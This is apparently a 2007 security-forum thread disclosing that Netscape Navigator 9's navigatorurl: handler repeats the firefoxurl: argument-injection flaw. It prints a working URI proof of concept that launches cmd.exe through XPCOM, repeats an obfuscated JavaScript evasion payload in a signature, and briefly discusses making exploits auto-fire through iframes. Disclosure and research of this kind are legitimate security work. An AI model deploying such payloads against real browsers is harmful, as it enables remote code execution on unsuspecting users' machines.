I'm sure if you are looking at this, you've probably seen the research Rios and I have done over the past couple months take off with a few new full disclosure postings... well, I didn't want to leave you bored for the weekend. Remember Rios's and Thor's FirefoxURL?

Here's a quote from Rios about the subject:

"This URI basically allows us to use IE to spawn an instance of FireFox (if the user has recent version of firefox2 installed on the machine). Normally, this wouldn't be too big of an issue, however in this case, we can pass arbitrary arguments to the URI, which ultimately get passed to FireFox.exe. With this in mind, we can initiate an XSS if the user simply browses to my site with IE, and has a recent version of FireFox2 installed (XSS and CSRF apply)..... but WAIT.. it gets better... because we can control the arguments passed to FireFox.exe, we can do other fun things, like add a FireFox profile to the users machine (without user consent)."

And not to be outdone, here's my follow up of the same thing for Netscape Navigator 9, which uses navigatorurl: instead of firefoxurl:. This is Rios's original PoC for firefoxurl, all I did was change the firefox to navigator... how funny is that?

navigatorurl:test"%20-chrome%20"javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)

Are we ready to stop pointing the finger yet? Seems like everyone is vulnerable.



Edited 1 time(s). Last edit at 07/14/2007 12:28AM by nmcfeters.

Anyone up for calling this the month of URI bugs?

Again nice one! (Impact: 35)

---
g:0in~/*for another*/~alert(!!1)
(Å='',[Ç=!(µ=!Å+Å)+{}][Ç[ª=µ[++Å]+µ[Å-Å],È=Å-~Å]+Ç[È+È]+ª])()[Ç[Å]+Ç[Å+Å]+µ[È]+ª](Å)
me || PHPIDS || Twitter || <malicious></markup>



Edited 1 time(s). Last edit at 07/14/2007 04:41AM by .mario.

Thanks Mario. Been a bit suprised at the slow response to the Trillian stuff... guess we'll keep releasing.

Very much appreciated indeed!

---
g:0in~/*for another*/~alert(!!1)
(Å='',[Ç=!(µ=!Å+Å)+{}][Ç[ª=µ[++Å]+µ[Å-Å],È=Å-~Å]+Ç[È+È]+ª])()[Ç[Å]+Ç[Å+Å]+µ[È]+ª](Å)
me || PHPIDS || Twitter || <malicious></markup>

Really suprised that this one hasn't got more attention... it's actually the same exact thing as the firefoxurl flaw that Rios posted earlier, just now its on Netscape Navigator 9. You can see the proof of concept link here: [www.xs-sniper.com]

Totally suprising the response to these, suffice it to say that we have more that will be released shortly.

Did you send the stuff to the sec mailinglists and secunia? Maybe it would be interesting to see exploits for *nix too if possible. Also you could provide an exploit that auto fires (the 'I have to click on the link'-PoCs don't impress most users very much - no idea why).

---
g:0in~/*for another*/~alert(!!1)
(Å='',[Ç=!(µ=!Å+Å)+{}][Ç[ª=µ[++Å]+µ[Å-Å],È=Å-~Å]+Ç[È+È]+ª])()[Ç[Å]+Ç[Å+Å]+µ[È]+ª](Å)
me || PHPIDS || Twitter || <malicious></markup>

Yeah, pretty stupid, I mean, its just as simple to put it in an <iframe> or something. I think we have submitted to secunia, we had at least one thing there.

Got my PM?

---
g:0in~/*for another*/~alert(!!1)
(Å='',[Ç=!(µ=!Å+Å)+{}][Ç[ª=µ[++Å]+µ[Å-Å],È=Å-~Å]+Ç[È+È]+ª])()[Ç[Å]+Ç[Å+Å]+µ[È]+ª](Å)
me || PHPIDS || Twitter || <malicious></markup>